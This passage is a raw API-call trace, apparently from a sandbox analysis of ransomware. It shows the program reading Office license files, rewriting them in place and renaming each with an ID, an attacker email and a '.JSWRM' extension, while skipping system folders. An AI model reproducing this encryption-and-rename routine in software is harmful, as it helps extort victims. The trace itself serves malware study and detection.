CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.930] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22093) returned 1 [0102.930] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5640) returned 0x24c1d0 [0102.930] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5640, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5640, lpOverlapped=0x0) returned 1 [0102.934] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.934] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5640, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5640, lpOverlapped=0x0) returned 1 [0102.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.934] CloseHandle (hObject=0x45c) returned 1 [0102.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0102.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0102.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0102.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0102.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0102.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0102.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.935] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0102.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0102.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0102.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.936] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3bd6df0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3bd6df0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3c9598b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d61, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="HO620E~1.XRM")) returned 1 [0102.936] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.936] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.936] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.936] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.936] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.936] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.936] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0102.936] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.936] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.936] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0102.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0102.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0102.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0102.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0102.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0102.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0102.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0102.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0102.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.937] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11617) returned 1 [0102.937] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0102.937] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0102.939] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.939] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0102.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.944] CloseHandle (hObject=0x45c) returned 1 [0102.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0102.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0102.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0102.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0102.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0102.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0102.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.945] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0102.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0102.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0102.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.946] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3b8a961, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3b8a961, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3c232ad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dfa, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="HOMEBU~3.XRM")) returned 1 [0102.946] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0102.946] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0102.946] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0102.946] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0102.946] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0102.946] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0102.946] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0102.946] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.946] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0102.946] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0102.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0102.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0102.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0102.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0102.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0102.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0102.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0102.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0102.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0102.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.947] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19962) returned 1 [0102.947] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0102.947] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0102.950] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.950] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0102.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.950] CloseHandle (hObject=0x45c) returned 1 [0102.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0102.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0102.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0102.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0102.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0102.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0102.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.950] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0102.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0102.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0102.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.951] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3ed1ce3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3ed1ce3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3fb6b6c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29ab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp2-pl.xrm-ms", cAlternateFileName="HO2C67~1.XRM")) returned 1 [0102.951] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-pl.xrm-ms", lpString2=".") returned 1 [0102.951] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-pl.xrm-ms", lpString2="..") returned 1 [0102.951] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-pl.xrm-ms", lpString2="...") returned 1 [0102.951] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-pl.xrm-ms", lpString2="windows") returned -1 [0102.951] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-pl.xrm-ms", lpString2="recovery") returned -1 [0102.952] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-pl.xrm-ms", lpString2="perflogs") returned -1 [0102.952] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0102.952] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.952] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-pl.xrm-ms", lpString2="system volume information") returned -1 [0102.952] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-pl.xrm-ms", lpString2="msocache") returned -1 [0102.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0102.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0102.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0102.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0102.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0102.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 